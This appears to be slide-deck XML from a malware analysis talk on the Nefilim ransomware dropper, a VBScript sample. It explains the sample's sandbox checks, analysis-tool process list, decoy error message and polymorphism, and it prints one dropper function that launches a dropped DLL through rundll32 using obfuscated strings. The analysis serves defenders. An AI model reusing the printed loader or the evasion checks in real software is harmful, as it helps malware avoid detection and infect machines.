              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The passed value "vertebrate" is the value that holds the URL that we send the GET request to.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In our case, "-" was sent, so the HTTP GET will fail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checked the other blocks of code for anything that calls DlAMe() – there were a few, but they only sent "-"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So this function always fails… So why include it?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dunno, could be they intended to have the sample exfil some enumeration info.</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06a6730fe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06a6730fe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06a6730fe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06a6730fe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06a6730fe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06a6730fe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 install a Windows 10, 64-bit VM on VirtualBox, the default is 50 GB.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If you chose the default, the result of the script would be slightly less than 50 GB.</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my vbox VM is configured with a 60 GB hard drive, the wmi output:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Size     	: 64317550592</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Divide that number by 1024, then 1024, then 1024, the result is:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>59.90038681   ⇐ slightly less than 60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why do this check?  This is an anti-analysis feature - if the disk storage is under 50 GB, that's probably a VM that someone is using to test the malware sample – so don't run, destroy the evidence.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06a6730fea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06a6730fe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06a6730fe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06a6730fe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08a08585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08a08585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08a085859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08a085859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08a085859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08a085859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that's weird, MSVCR101.dll doesn't appear to be a Windows file, the first hit is a TrendMicro article about a malware sample.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why pop up this message box?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>My guess is it's kind of like a false flag – say you're the victim that runs the VBS – it appears to be trying to do stuff, then this error pops up, what's the victim's reaction?  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Probably "oh darn, it doesn't work" and you move on with your life thinking the VBS failed to run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310f6999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310f6999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on the Pyramid of Pain:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html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one example of why the file hashes appear at the bottom of the Pyramid of Pain</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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08a085859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08a085859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FileExists(sandhill + "adobe.url")  — what is sandhill?</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08a085859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08a085859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https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/getspecialfolder-method</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GetSpecialFolder(2) == TemporaryFolder</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Temp folder is used to store temporary files. Its path is found in the TMP environment variable.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08a085859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08a085859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08a085859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08a085859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08a085859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108a085859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code for this process was much too long to fit into a slide, so here are the important parts.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Yellow, we see that we are retrieving a list of running processes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Green, we see an IF statement that searches for a match on the process name - we are comparing it to a list, we'll get to the list in the next slide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Orange, we see another IF statement checking if there are less than 28 total processes running - I compared this to my Win10 VM, I had 66 running processes</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108a085859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108a085859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actually a few more… the full list is 139 file names, above is the first 125</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We see things like:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>tcpdump.exe - used to capture packets</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>procexp.exe - process explorer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>autoruns.exe - sysinternals util to list autoruns</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ollydbg.exe - Windows debugger</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08a085859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108a085859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function was too large to fit on a slide, here's the full function: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Function ERa()</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    GewqX("DEBUG: F_RUN - Start")</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    chivalrous=60000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    pbI=40000</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    Randomize</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    Set setupService = GetObject("winmg" + "mts:Win32_Pro" + "cess")</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    If (InStr(WScript.ScriptName, cStr(82984)) &gt; 0 And ucMHV = 0) Then</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 tawny</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 With WScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   		 .Sleep Int((chivalrous-pbI+1)*Rnd+pbI)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 End With</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 desperate = "ca" + "lc.e" + "xe"</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 setupService.create desperate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 GewqX("DEBUG: F_RUN_T - True")</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    Else</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 tawny</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 With WScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   		 .Sleep Int((chivalrous-pbI+1)*Rnd+pbI)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 End With</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 avlt = "rundll32" + " " + sandhill + "racial.drc" + ",DllRegisterServer":setupService.create avlt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 GewqX("DEBUG: F_RUN_W - True")</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 DlAMe("-")</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>   	 nimbus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>    End If</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>End Function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Of interest is the first IF statement – if the filename shows it is the testing filename, just start calc.exe rather than run the dropped DLL.</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08a0858594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08a0858594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0a14017d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10a14017d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08a085859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108a085859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6a6730f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6a6730f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FOR loop contains the code that causes the variation in the dropped files.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The key things are "Randomize", the IF statement and the "Rnd" function.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Let's look into these things.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that I have done some editing to make the code more readable</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08a0858594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108a0858594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08a085859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08a085859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08a0858594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108a0858594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108a085859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108a085859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0a14017d3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0a14017d3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0a14017d3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0a14017d3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0a14017d3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0a14017d3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10a14017d3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10a14017d3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4cfb0330c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4cfb0330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https://www.w3schools.com/asp/func_rnd.asp</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Rnd function returns a random number. The number is always less than 1 but greater or equal to 0</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4cfb0330c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4cfb0330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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId6"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2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24.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Polymorphism in the Nefilim Dropper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If clause - how we create some randomness</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Randomize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if myInput(myArrayAddress) = 999999 Then</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   		 myReturnValue = myReturnValue &amp; ChrW(Int((-7)*Rnd+myNine))</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rPr>
              <a:t>our possible range of values:</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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if Rnd = 0, we get 9</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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if Rnd = 0.9999999, we get 2.0000007, which becomes 2 due to Int()</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en" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>so our range of values is from 2 to 9</a:t>
            </a:r>
            <a:endParaRPr sz="24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 where does 999999 occur?</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xaCQ = Array(15,8,138,201,20,22,190,76,259,&lt;&lt;&lt;snipped&gt;&gt;&gt;,73,136,201,</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77,262,262,262,242,10,146,92,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>999999,999999,999999,999999,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7,146,76,</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>255,145,223,</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So here's what we now know:</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at some point in the file, there are 4 random-ish values between 0x02 and 0x09</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Sidebar #2 - The Maths - How polymorphic is it?</a:t>
            </a:r>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n">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A range of 2 to 9, that's 8 unique values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4 of them in a row means 8^4, which is 4096</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But there's an asterisk… The only way we get a 9 value is if Rnd returns a 0</a:t>
            </a:r>
            <a:endParaRPr>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But given that Rnd returns 7 places to the right of the decimal, it is extremely unlikely to return 0</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Say Rnd returns the smallest non-zero value possible, 0.0000001, the IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> returns an 8 value:  </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1600"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
